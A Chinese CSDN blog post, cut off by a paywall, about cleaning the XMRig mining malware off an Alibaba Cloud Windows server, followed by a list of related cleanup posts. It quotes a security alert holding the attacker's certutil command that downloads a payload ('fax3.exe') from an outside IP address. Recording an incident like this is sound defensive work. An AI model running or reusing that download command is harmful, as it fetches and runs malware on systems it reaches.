阿里云服务器中招挖矿病毒XMrig miner解决方法

最新推荐文章于 2024-09-09 17:18:24 发布
最新推荐文章于 2024-09-09 17:18:24 发布
阅读量1.4w 收藏 4
点赞数
分类专栏: 网络安全 文章标签: 云服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Starbme_2018/article/details/104939248
版权

今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。

查了一下告警信息,如下:

该告警由如下引擎检测发现:
执行命令的进程:xxxxx/oracle/product/11.2.1/db_1/database/System
恶意文件md5:1da0bf986119a583285499047edcd74a
进程id:9,332
描述:通常黑客入侵后会植入挖矿程序赚取收益,该类程序占用CPU等资源,影响用户正常业务,危害较大。且该程序可能还存在自删除行为,
或伪装成系统程序以躲避检测。如果发现该文件不存在,请检查是否存在可疑进程、定时任务或启动项。具体详情可查看帮助:

https://helpcdn.aliyun.com/knowledge_detail/41206.html

该告警由如下引擎检测发现:
父进程路径:xxxxx/oracle/product/11.2.1/db_1/BIN/oracle.exe
父进程命令行:xxxxx\oracle\product\11.2.1\db_1\bin\ORACLE.EXE ORCL
父进程id:1384
进程id:11736
URL链接:http://120.167.68.2:807/fax3.exe
进程路径:C:/Windows/SysWOW64/cmd.exe
命令行参数:cmd /c certutil.exe -urlcache -split -f http://60.12.77.171:807/fax3.e
最低0.47元/天 解锁文章
Starbme_2018
关注
专栏目录
记一次清理挖矿病毒的过程
邓邓子的博客
07-05 1246
网站挂掉了,查看后台服务已宕掉,无法正常重启。在没有启动任何服务的情况下,内存已基本被耗尽: 2.查看各进程资源使用情况 看到 xmrig 占用了资源。 查看 root 文件内容: 查看 .moneroocean 目录下文件: 4.删除文件 5.杀掉 xmrig 进程 查找所有的 xmrig 进程并杀掉: 6.重启服务 最好重启下服务器再重启服务,此时服务已正常。......
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 3997
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
阿里云服务器xmrig矿毒
qq_35692783的博客
09-27 1385
今天访问云服务器的时候,命令输入很慢,于是输入top查看进程运行情况,发现有个名叫xmrig的进程占用CPU占90+%以上。 百度查了一下发现是挖矿的,应该是上次安装redis后没设置访问密码的原因。 先是尝试用 kill -9 进程ID 杀掉,结果又有新的xmrig产生了,于是就查看这个进程的执行文件在哪里,然后把这个目录下的文件全都删掉。 /proc/进程ID/exe rm -rf /root/.c3pool 输入top之后发现还存在,再次尝试kill,成功杀死并且没有新的进程产生了。 网上说可能
TCP 木马 CoinMiner 尝试连接矿池(XMR) 入侵原理
zengliguang的专栏
08-28 676
CoinMiner 是一种恶意软件,利用 TCP 连接矿池进行加密货币挖矿
根除矿机病毒xmrig
qq_19582693的博客
07-28 1206
根除xmrig矿机病毒
记一次挖矿病毒的应急响应
weixin_45885440的博客
03-30 3097
记一次挖矿病毒的应急响应
xmrig挖矿病毒彻底清除
mynameisjinxiaokai的博客
04-20 7760
1、通过top命令查看进程发现,占用CPU最大的进程是一个叫xmrig的进程。3、最后一定要修改机器密码,不然过几天还会存在。2、找到xmrig所在的文件并删除。记录下进程的PID,然后杀死进程。
xmrig挖矿病毒解决
yuguang的博客
11-20 1万+
1、问题排查显示 1.1服务器中情况 1.2后台查看情况 2、查看进程 [root@ecs-44a1 cron]# ll /proc/8236/exe lrwxrwxrwx 1 root root 0 Nov 20 10:52 /proc/8236/exe -> /etc/c3pool/xmrig [root@ecs-44a1 cron]# 3、查看进程文件 [root@ecs-44a1 cron]# ll /pr...
初步解决挖矿病毒xmrig cpu miner
热门推荐
qq_42906657的博客
09-16 3万+
初步解决挖矿病毒xmrig cpu miner 本人初学者,前段时间写了个爬虫,暴露了ip,服务器受到攻击,被植入了木马,后来就发现中了这个挖矿病毒。之前曾经解决过,是把任务管理器中杂七杂八的进程都结束掉:将不认识的后缀为32位的进程都结束掉。 但是我服务器重启后发现还是有这个问题,说明注册表没清干净。 今天查了下网上的解决方案,好像都是用工具,没有比较简单的方法。下面是我今天初步清除的...
服务器遭遇xmrig挖矿病毒
康小虎的博客
12-25 3800
发现问题: 在自己买的阿里云服务器上部署的项目之前就偶尔会自己kill掉,一直没有在意,重启项目后继续使用。但是昨天重启后一直被kill掉,根本没法正常启动,用top命令看了一下,发现一个奇怪的进程一直占用CPU在50%左右,然后去阿里云控制台看了一下,最近一个月CPU使用率几乎都接近100%。最后上网查了一下,xmrig是一款挖矿病毒 解决问题: 百度了一下暂时解决了,基本跟阿里给的方案一样。直接看看阿里售后的说法: 1、首先看一下为什么阿里云没有安全提示 ![在这里插入图片描述](https:/
## 记录一次简单的xmrig挖矿程序清理
qq_42422547的博客
05-11 4123
记录一次简单的xmrig挖矿程序清理 晚上闲着没事逛逛网站无意间发现cpu居然一直处于99.9的状态。 5.9 linux服务器,2核4G contos 7 小白一枚,还在纳闷是什么东西占了这么多的资源开始排查 1.使用putty登录后,top命令查看占用比较高的进程是啥,打开发现是xmrig这个进程,查了下资料说这个是个挖矿程序, 2,记下它的进程号去找文件位置 ls -l /proc/进程ID/exe 查看进程文件的位置 3,杀掉进程 kill -9 进程id 删除进程文件。 对于处理这种事情
阿里云ECS_Linux服务器解决蠕虫病毒MinerGuard
qq_17349563的博客
05-22 2167
本文为自己的阿里云Linux中挖矿病毒的处理过程以及心得整理 PS: 如果有时间的话请去 http://www.chenjk.cn 或者 https://winterck.github.io 上去看看,里面是我刚写不久的博客原文,如果能有意见告知的话就最好了,感谢。 正文: 之前一天上班码BUG的时候,突然收到了阿里的短信,提示正在连接恶意下载源,当时我就。。 不过那时候的云服务器里没有自...
博客被挖矿程序xmrig入侵以及我的解决方案(docker安全)
马赛琦的博客
09-03 8236
文章记录了一次由于Docker配置的漏洞导致的挖矿程序入侵的发现过程以及解决方案。由于本人时间有限,没有时间去深度学习linux的相关运维知识,所以解决方案可能是比较浅显的,还望您在阅读本文前知悉。 前言 2019年9月2日凌晨,我正准备关闭电脑睡觉,突然收到阿里云的一条短信,说是服务器被挖矿软件入侵了,一开始我是不相信的,就我这草履虫一样的网站,应该没有任何会来才对啊,后来查看了一下阿里云后...
linux服务器彻底清除xmrig挖矿病毒
暴走地水牛的博客
06-02 4150
在linux服务器上彻底清除xmrig挖矿病毒
网络安全-挖矿病毒XMrig miner
L120305q的博客
04-05 899
挖矿病毒XMrig miner
Linux服务器防护+对抗挖矿病毒全流程探索
最新发布
weixin_44197439的博客
09-09 891
服务器中了两次挖矿病毒,一次比一次厉害。在此记录一下杀毒全过程,为了永久解决这个问题,也寻找了常见的安全防护方法,为后来作参考。
xmrig病毒的清理
qq_41957174的博客
01-18 3971
xmrig病毒的清理
腾讯云服务器被恶意挖矿处理建议----检测到存在待处理的恶意文件:/usr/share/xmrigMiner,威胁等级:严重,您的服务器疑似被黑客入侵,建议您及时确认,避免造成严重损失。
weixin_58622844的博客
08-09 3225
事情是这样的,前两天搭建微服务项目的时候需要用到服务器,第一天刚部署上项目,紧接着第二天就被黑客扫了,既没办法访问,也没办法远程连接。
centos7挖矿病毒(xmrig,javs)清理
yuanwendong11的博客
07-26 3961
1. 查看计划任务 ls /var/spool/cron 删除异常任务其配置项。如果当前系统之前并未配置过计划任务,可以直接删除计划脚本目录即可: rm -rf /var/spool/cron/* 2. 查看密钥认证文件 删除木马创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接清空认证存放目录: rm -rf /root/.ssh/* 如果有配置过密钥认证,需要删除指定的黑客创建的认证文件即可。 3. 修复 SSH 配置项 一般默认脚本中进行修改的 PermitRootLogin、R.
linux感染挖矿病毒
01-27
根据提供的引用内容,以下是处理Linux感染挖矿病毒解决方案: 1. 首先,使用命令行工具(如`ps`、`top`)查看系统中正在运行的进程,找出可能是挖矿病毒的进程。可以使用以下命令: ```shell ps aux | grep miner ``` 或者 ```shell top ``` 2. 找到挖矿病毒进程后,使用`kill`命令终止该进程。可以使用以下命令: ```shell kill <进程ID> ``` 3. 如果上述步骤无法解决问题,可能存在其他类型的挖矿病毒,如pamdicks病毒。此时,可以使用杀毒软件(如VirusTotal)对系统进行全面扫描,以检测和清除潜在的恶意文件。VirusTotal是一个免费的在线扫描服务,可以检测文件、域名、IP地址、URL等是否含有恶意代码或威胁。 请注意,处理挖矿病毒需要小心谨慎,建议在专业人士的指导下进行操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值